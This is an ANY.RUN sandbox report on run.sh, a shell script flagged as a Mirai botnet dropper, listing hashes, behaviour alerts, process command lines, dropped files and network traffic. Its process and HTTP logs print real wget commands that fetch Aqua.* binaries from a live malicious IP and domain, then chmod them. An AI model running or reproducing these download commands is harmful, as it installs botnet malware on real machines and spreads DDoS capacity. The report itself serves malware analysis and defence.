Malware analysis run.sh Malicious activity | ANY.RUN

Add for printing

File name:	run.sh
Full analysis:	https://app.any.run/tasks/cb2f1b73-637f-4e96-be62-ce8d7f79863b
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Mirai is a self-propagating malware that scans the internet for vulnerable IoT devices and infects them to create a botnet. Mirai variants utilize lists of common default credentials to gain access to devices. Mirai's primary use is for launching distributed denial-of-service (DDoS) attacks, but it has also been used for cryptocurrency mining. Malware Trends Tracker >>>
Analysis date:	April 29, 2025, 08:09:13
OS:	Ubuntu 22.04.2
Tags:	mirai botnet
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	26C8C080C1A7BA0F1A425FECE57E4E7D
SHA1:	13FE7926CEFA5FFCC3298D43E68AE9251476F77F
SHA256:	7E18EA6D95CBB2F0BAAED139A6561DA86A0DDDF5549B7499BF63FF36285754B1
SSDEEP:	24:csvDVvRv+NNIRnvJvhvNvbJnvMNorTvpvZv/vvvh:csbVpBhZl9MwTBxXnJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- MIRAI has been detected (SURICATA)
  - wget (PID: 40690)
  - Aqua.x86_64 (PID: 40711)
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 40666)
- Executes commands using command-line interpreter
  - sudo (PID: 40669)
- Uses wget to download content
  - bash (PID: 40670)
- Reads passwd file
  - gdm-session-worker (PID: 40750)
  - dbus-daemon (PID: 40780)
  - pipewire (PID: 40764)
  - pipewire-media-session (PID: 40765)
  - dbus-daemon (PID: 40892)
  - ibus-daemon (PID: 40958)
  - gvfs-udisks2-volume-monitor (PID: 40899)
- Potential Corporate Privacy Violation
  - wget (PID: 40672)
  - wget (PID: 40675)
  - wget (PID: 40678)
  - wget (PID: 40681)
  - wget (PID: 40690)
  - wget (PID: 40696)
  - wget (PID: 40699)
  - wget (PID: 40684)
  - wget (PID: 40687)
  - wget (PID: 40693)
  - wget (PID: 40702)
  - wget (PID: 40705)
  - wget (PID: 40708)
- Reads /proc/mounts (likely used to find writable filesystems)
  - dbus-daemon (PID: 40780)
  - dbus-daemon (PID: 40798)
  - gnome-shell (PID: 40859)
  - gjs-console (PID: 40947)
- Checks DMI information (probably VM detection)
  - pulseaudio (PID: 40766)
  - pipewire (PID: 40764)
  - gnome-shell (PID: 40859)
- Connects to unusual port
  - Aqua.x86_64 (PID: 40712)
  - Aqua.x86_64 (PID: 40711)
- Connects to the server without a host name
  - wget (PID: 40708)
- Contacting a server suspected of hosting an CnC
  - Aqua.x86_64 (PID: 40711)
INFO
- Checks timezone
  - wget (PID: 40672)
  - wget (PID: 40675)
  - wget (PID: 40678)
  - wget (PID: 40681)
  - wget (PID: 40687)
  - wget (PID: 40684)
  - wget (PID: 40690)
  - wget (PID: 40693)
  - wget (PID: 40696)
  - wget (PID: 40708)
  - wget (PID: 40702)
  - wget (PID: 40699)
  - wget (PID: 40705)
  - gdm-session-worker (PID: 40750)
  - dbus-daemon (PID: 40780)
  - tracker-miner-fs-3 (PID: 40881)
  - gnome-session-binary (PID: 40814)
  - python3.10 (PID: 40850)
  - python3.10 (PID: 40851)
  - python3.10 (PID: 40966)
- Creates file in the temporary folder
  - wget (PID: 40672)
  - wget (PID: 40675)
  - wget (PID: 40681)
  - wget (PID: 40678)
  - wget (PID: 40684)
  - wget (PID: 40687)
  - wget (PID: 40690)
  - wget (PID: 40693)
  - wget (PID: 40699)
  - wget (PID: 40702)
  - wget (PID: 40705)
  - wget (PID: 40708)
  - wget (PID: 40696)
  - gnome-shell (PID: 40859)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

407

Monitored processes

183

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
40665	/bin/sh -c "sudo chown user /tmp/run\.sh && chmod +x /tmp/run\.sh && DISPLAY=:0 sudo -iu user /tmp/run\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
40666	sudo chown user /tmp/run.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40667	chown user /tmp/run.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
40668	chmod +x /tmp/run.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40669	sudo -iu user /tmp/run.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
40670	-bash --login -c \/tmp\/run\.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
40671	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
40672	wget http://193.200.78.28/Aqua.arm4	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
40673	chmod 777 Aqua.arm4 run.sh snap-private-tmp systemd-private-ea9b991fe646425c8c788ace317f0da5-colord.service-Ni0Qqs systemd-private-ea9b991fe646425c8c788ace317f0da5-ModemManager.service-qL6jR8 systemd-private-ea9b991fe646425c8c788ace317f0da5-power-profiles-daemon.service-O28Svt systemd-private-ea9b991fe646425c8c788ace317f0da5-switcheroo-control.service-5jmLOh systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-logind.service-l8X7Ra systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-oomd.service-YHCA0i systemd-private-ea9b991fe646425c8c788ace317f0da5-systemd-resolved.service-iDb1yE systemd-private-ea9b991fe646425c8c788ace317f0da5-upower.service-fLmIwG tracker-extract-3-files.1000	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 256
40674	-bash --login -c \/tmp\/run\.sh	/usr/bin/bash	—	bash
User: user Integrity Level: UNKNOWN Exit code: 32512

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
40672	wget	/tmp/Aqua.arm4		binary
		MD5:—	SHA256:—
40675	wget	/tmp/Aqua.arm5		binary
		MD5:—	SHA256:—
40678	wget	/tmp/Aqua.arm6		binary
		MD5:—	SHA256:—
40681	wget	/tmp/Aqua.arm7		binary
		MD5:—	SHA256:—
40684	wget	/tmp/Aqua.i686		binary
		MD5:—	SHA256:—
40687	wget	/tmp/Aqua.m68k		binary
		MD5:—	SHA256:—
40690	wget	/tmp/Aqua.mips		binary
		MD5:—	SHA256:—
40693	wget	/tmp/Aqua.mpsl		binary
		MD5:—	SHA256:—
40696	wget	/tmp/Aqua.ppc		binary
		MD5:—	SHA256:—
40699	wget	/tmp/Aqua.sh4		binary
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.49:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
40678	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.arm6	unknown	—	—	unknown
40681	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.arm7	unknown	—	—	unknown
40684	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.i686	unknown	—	—	unknown
40687	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.m68k	unknown	—	—	unknown
40672	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.arm4	unknown	—	—	unknown
40690	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.mips	unknown	—	—	unknown
40675	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.arm5	unknown	—	—	unknown
40693	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.mpsl	unknown	—	—	unknown
40696	wget	GET	200	193.200.78.28:80	http://193.200.78.28/Aqua.ppc	unknown	—	—	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.49:80	connectivity-check.ubuntu.com	Canonical Group Limited	GB	whitelisted
—	—	207.211.211.27:443	odrs.gnome.org	—	US	whitelisted
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
—	—	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.58:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
512	snapd	185.125.188.55:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted
40672	wget	193.200.78.28:80	raw.intenseproxy.zip	—	CH	unknown
40675	wget	193.200.78.28:80	raw.intenseproxy.zip	—	CH	unknown
40678	wget	193.200.78.28:80	raw.intenseproxy.zip	—	CH	unknown
40681	wget	193.200.78.28:80	raw.intenseproxy.zip	—	CH	unknown

DNS requests

Domain	IP	Reputation
connectivity-check.ubuntu.com	2620:2d:4000:1::2a 2620:2d:4002:1::197 2620:2d:4000:1::97 2620:2d:4000:1::2b 2620:2d:4000:1::22 2620:2d:4000:1::98 2620:2d:4002:1::196 2620:2d:4000:1::96 2620:2d:4002:1::198 2001:67c:1562::24 2001:67c:1562::23 2620:2d:4000:1::23 185.125.190.49 91.189.91.96 91.189.91.49 185.125.190.48 185.125.190.98 91.189.91.98 91.189.91.48 185.125.190.18 185.125.190.97 91.189.91.97 185.125.190.96 185.125.190.17	whitelisted
odrs.gnome.org	207.211.211.27 169.150.255.183 37.19.194.80 195.181.175.41 212.102.56.178 195.181.170.18 169.150.255.181	whitelisted
1527653184.rsc.cdn77.org	—	unknown
google.com	142.250.186.110 2a00:1450:4001:829::200e	whitelisted
api.snapcraft.io	185.125.188.55 185.125.188.58 185.125.188.54 185.125.188.59 2620:2d:4000:1010::42 2620:2d:4000:1010::344 2620:2d:4000:1010::117 2620:2d:4000:1010::6d	whitelisted
raw.intenseproxy.zip	193.200.78.28	unknown
5.100.168.192.in-addr.arpa	—	unknown

Threats

PID	Process	Class	Message
40672	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
40672	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
40675	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
40675	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
40678	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
40678	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
40681	wget	Potentially Bad Traffic	ET INFO ARM7 File Download Request from IP Address
40681	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP
40681	wget	Potentially Bad Traffic	ET HUNTING Suspicious GET Request for .arm file File
40684	wget	Potential Corporate Privacy Violation	ET INFO Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

run.sh

26C8C080C1A7BA0F1A425FECE57E4E7D

13FE7926CEFA5FFCC3298D43E68AE9251476F77F

7E18EA6D95CBB2F0BAAED139A6561DA86A0DDDF5549B7499BF63FF36285754B1

24:csvDVvRv+NNIRnvJvhvNvbJnvMNorTvpvZv/vvvh:csbVpBhZl9MwTBxXnJ

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

MIRAI has been detected (SURICATA)

SUSPICIOUS

Modifies file or directory owner

Executes commands using command-line interpreter

Uses wget to download content

Reads passwd file

Potential Corporate Privacy Violation

Reads /proc/mounts (likely used to find writable filesystems)

Checks DMI information (probably VM detection)

Connects to unusual port

Connects to the server without a host name

Contacting a server suspected of hosting an CnC

INFO

Checks timezone

Creates file in the temporary folder

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings